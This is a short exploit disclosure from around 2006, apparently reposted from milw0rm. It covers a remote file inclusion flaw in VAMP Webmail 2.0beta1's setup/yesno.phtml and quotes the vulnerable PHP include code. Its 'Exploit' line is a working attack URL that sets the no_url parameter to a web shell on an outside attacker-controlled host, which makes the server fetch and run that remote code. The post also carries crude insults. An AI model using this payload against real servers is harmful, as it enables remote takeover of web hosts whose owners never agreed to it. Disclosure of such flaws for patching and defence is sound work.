Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14528
HistoryOct 02, 2006 - 12:00 a.m.

VAMP Webmail <= 2.0beta1 (yesno.phtml) Remote Include Vulnerability

2006-10-0200:00:00
vulners.com
88
ToXiC

#VAMP Webmail Remote File Inclusion by ToXiC CreW

#BuG FounD by Drago84

#Application Affect:VAMP Webmail

#Page:

yesno.phtml

#Dir :

/setup/

#Problem:

<?if($answer=="Yes") {

include $yes_url;

} else {

include $no_url;

}?>

ExPloit :

#http://www.site.com/wamp_dir/setup/yesno.phtml?no_url=http://sonic-banda-di-lamer.gay/shell.php?

GrEatZ All Member of ToXiC, Str0ke

#FUCK #Sonic

ToXic Security Italian CreW

ToXiC

milw0rm.com [2006-09-30]